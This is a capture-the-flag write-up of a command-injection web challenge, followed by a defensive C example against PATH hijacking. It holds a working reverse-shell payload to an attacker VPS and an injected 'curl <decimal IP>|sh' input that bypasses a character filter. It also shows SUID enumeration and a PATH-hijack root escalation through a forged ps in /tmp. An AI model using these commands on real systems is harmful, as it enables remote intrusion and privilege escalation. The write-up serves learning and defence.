Opening the web page, I found that a lot of letters and characters are filtered:
b,d,e,-,q,f,g,i,p,j,+,k,m,n,<,>,o,w,x,~,:,^,@,&,,%,",*,(,),!,=,.,[,],},{,_);
As a result, most of our commands cannot be run. Eventually I noticed that curl is not filtered.
We can set up a VPS and use it to catch the reverse shell. Set the home page served by the VPS to:
bash -c "bash -i >& /dev/tcp/<VPS IP address>/5555 0>&1"
Start a web service on the VPS. If there is no Apache or other middleware, Python can be used:
python2:
python -m SimpleHTTPServer 80
python3:
python -m http.server 80
Then open another terminal on the VPS and listen on port 5555:
nc -lvnp 5555
Assume that the IP address of our VPS is 123.123.123.123. Because the page filters the dot (.), we cannot enter the IP address directly, and the dotted form would also exceed the length limit of 18 characters.
Therefore, we need to convert the IP address to its decimal form: search Baidu for "IP 十进制" (IP to decimal) and open one of the converters.
The decimal form of the IP address is: 2071690107
We enter the following on the page:
?ip=curl 2071690107|sh
and the reverse shell connects back to our VPS.
Running id shows that we are a low-privileged user: www-data
Search for the flag:
find / -name flag
It could not be found. There is no user directory under /home either, so the flag can only be in /root, which we have no permission to read, so we cannot search there.
We need to escalate privileges to root. First, look for SUID binaries:
find / -user root -perm -4000 -print 2>/dev/null
A strange program is found: love
Running it returns a result immediately; no input is required.
We download it and reverse it with IDA. It turns out that love runs the ps program, with two characteristics:
1. The uid is set to 0, that is, root.
2. The ps command is invoked without specifying its directory (no absolute path), so it is looked up through PATH.
So we can forge a ps command to escalate privileges.
We create the forged ps command in the /tmp directory, because /tmp is writable by everyone (any other writable directory would also work):
cd /tmp # enter the /tmp directory
echo "/bin/bash" >ps # write the payload into the ps file
chmod 777 ps # make it readable, writable and executable
echo $PATH # view the PATH environment variable
export PATH=/tmp:$PATH # add /tmp to PATH, in the first position
Then we run love and find that we now have root privileges.
Now we can read the flag:
cat /root/flag
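From the defender's side, this added C example (my own code, not the CTF binary's) shows how the love program could have avoided the PATH hijack used above: run helpers only by absolute path under a fixed environment, and refuse a PATH that contains /tmp, relative or empty entries. The names path_is_trusted, run_with_fixed_env and TRUSTED_PATH are assumptions of the example.

```c
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Fixed search path a SUID program should use instead of the caller's $PATH. */
#define TRUSTED_PATH "/usr/sbin:/usr/bin:/sbin:/bin"

/* Return 1 only if every entry of a PATH-style string is a trusted directory;
 * an empty entry (= current directory), a relative entry or a world-writable
 * location such as /tmp makes the whole PATH untrusted. */
int path_is_trusted(const char *path)
{
    static const char *const allowed[] = { "/usr/sbin", "/usr/bin", "/sbin", "/bin" };
    if (path == NULL || *path == '\0')
        return 0;
    for (const char *p = path;;) {
        const char *end = strchr(p, ':');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        int ok = 0;
        for (size_t i = 0; i < sizeof allowed / sizeof *allowed; i++)
            if (len == strlen(allowed[i]) && memcmp(p, allowed[i], len) == 0)
                ok = 1;
        if (!ok)
            return 0;
        if (end == NULL)
            return 1;
        p = end + 1;
    }
}

/* Run a helper the way the hardened binary should: only by absolute path, with a
 * minimal fixed environment, so a PATH entry such as /tmp is never consulted.
 * Returns the child's exit status, -1 for a relative path or fork/wait error,
 * and 127 if the absolute path could not be executed. */
int run_with_fixed_env(char *const argv[])
{
    char *const envp[] = { "PATH=" TRUSTED_PATH, NULL };
    if (argv == NULL || argv[0] == NULL || argv[0][0] != '/')
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(argv[0], argv, envp);  /* execve never searches $PATH */
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

With this pattern, the forged /tmp/ps from the write-up is never found: the lookup of "ps" by name is rejected, and an absolute helper runs with PATH pinned to TRUSTED_PATH.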